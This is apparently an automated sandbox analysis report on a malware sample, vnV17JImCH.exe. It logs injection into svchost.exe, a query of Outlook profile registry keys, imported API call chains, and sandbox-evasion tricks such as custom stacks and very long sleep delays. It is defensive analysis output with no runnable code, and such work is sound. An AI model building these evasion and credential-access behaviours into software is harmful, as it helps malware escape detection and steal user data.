Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: vnV17JImCH.exe

Static file information: File size 80740352 > 1048576

Source: vnV17JImCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: vnV17JImCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: vnV17JImCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: vnV17JImCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: vnV17JImCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: vnV17JImCH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: vnV17JImCH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: svchost.exe, 00000002.00000002.4807032364.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2357967524.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4803380705.0000000003374000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: vnV17JImCH.exe, 00000000.00000003.2353830803.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, vnV17JImCH.exe, 00000000.00000003.2351340509.0000000004340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vnV17JImCH.exe, 00000000.00000003.2353830803.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, vnV17JImCH.exe, 00000000.00000003.2351340509.0000000004340000.00000004.00001000.00020000.00000000.sdmp

Source: vnV17JImCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: vnV17JImCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: vnV17JImCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: vnV17JImCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: vnV17JImCH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA4B37 LoadLibraryA,GetProcAddress,

0_2_00EA4B37

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EC8945 push ecx; ret	0_2_00EC8958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077AE7B8 push eax; iretd	2_2_077AE7E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A26B8 push eax; ret	2_2_077A26B9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A5CAB pushfd ; ret	2_2_077A5CB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_077A2BB3 pushfd ; ret	2_2_077A2BB9

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00EA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00EA48D7
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F25376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00F25376

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00EC3187

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\vnV17JImCH.exe

API/Special instruction interceptor: Address: 16F5354

Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 7280000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599511	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599385	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599169	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599050	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596458	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596325	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596210	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 7099			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 2724			Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-106496

Source: C:\Users\user\Desktop\vnV17JImCH.exe

API coverage: 4.7 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -39660499758475511s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6724	Thread sleep count: 7099 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6724	Thread sleep count: 2724 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599511s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599169s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -599050s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596458s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596325s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596210s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6720	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00F0445A
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0C6D1 FindFirstFileW,FindClose,	0_2_00F0C6D1
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00F0C75C
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F0EF95
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00F0F0F2
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F0F3F3
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F037EF
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00F03B12
Source: C:\Users\user\Desktop\vnV17JImCH.exe	Code function: 0_2_00F0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00F0BCBC

Source: C:\Users\user\Desktop\vnV17JImCH.exe

Code function: 0_2_00EA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00EA49A0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599511	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599385	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599169	Jump to behavior
